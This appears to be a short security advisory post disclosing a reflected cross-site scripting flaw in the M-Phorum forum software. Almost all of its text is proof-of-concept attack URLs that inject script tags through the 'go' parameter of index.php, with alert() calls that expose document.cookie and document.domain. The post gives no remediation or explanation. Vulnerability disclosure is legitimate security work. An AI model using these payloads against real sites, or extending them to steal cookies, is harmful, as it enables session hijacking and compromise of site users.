------------------------------------------------------------------------
-------------
M-Phorum Cross Site Scripting

Site:http://m-phorum.sourceforge.net/site/

Credit : CodeXpLoder'tq
webpage:www.biyosecurity.com
Mail :codexploder (at) linuxmail (dot) org [email concealed]

------------------------------------------------------------------------
-------------
M-Phorum

http://victim/path/index.php?go="><script>alert(document.cookie)</script
>
http://victim/path/index.php?go="><script>alert(/Codexploder'tq/)</scrip
t>
http://victim/path/index.php?go="><script>alert(document.domain)</script
>

http://victim/path/?go="><script>alert(document.cookie)</script>
http://victim/path/?go="><script>alert(/BiyoSecurityTeam/)</script>
http://victim/path/?go="><script>alert(document.domain)</script>

------------------------------------------------------------------------
-------------

Source:

http://www.blogcu.com/Liz0ziM/338295

http://biyosecurity.be/bugs/mphorum.txt

[ reply ]